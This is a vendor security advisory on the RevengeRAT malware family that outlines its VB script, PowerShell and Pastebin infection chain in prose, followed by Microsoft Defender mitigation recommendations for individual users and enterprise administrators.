Threat behavior
RevengeRAT, or Revenge, is a malware family used by multiple operators. It shares code and behavior similarities, as well as tactics, techniques, and procedures (TTPs), with other publicly available RAT campaigns such as AsyncRAT, QuasarRAT, WSHRat, LimeRAT, Netwire, Cybergate, Vjw0rm, and ClipBanker, and several others that are currently unnamed.
Once the user downloads the VB script, it launches with the wscript.exe process. The VB script then launches a PowerShell script, which in turn connects to a Pastebin site and downloads a second-stage script SysTray.PS. This script initiates additional processes to maintain persistence, collect data, and then connect to the attacker’s command-and-control (C2) server to exfiltrate data from the target device.
Prevention
Guidance for Individual users
Keep your operating system and antivirus products up to date. Customers who have turned on automatic updates do not need to take additional action
Take these steps to help prevent malware infection on your computer.
Guidance for enterprise administrators and Microsoft 365 Defender customers
Ransomware more than often attacks enterprises than individuals. Following the below mitigation stepTake these steps to help prevent malware infection on your computers can help prevent ransomware attacks.
Microsoft recommends the following mitigations to reduce the impact of activity:
- Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
- Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
- Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume.
- Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Defender for Office 365 customers should ensure that Safe Attachments and Safe Links protection is enabled for users with Zero-hour Auto Purge (ZAP) to remove emails when a URL gets weaponized post-delivery.
- Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
- Block process creations originating from PsExec and WMI commands – Some organizations might experience compatibility issues with this rule on certain server systems but should deploy it to other systems to prevent lateral movement originating from PsExec and WMI, including Impacket’s WMIexec.
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Use advanced protection against ransomware
- Block all Office applications from creating child processes.
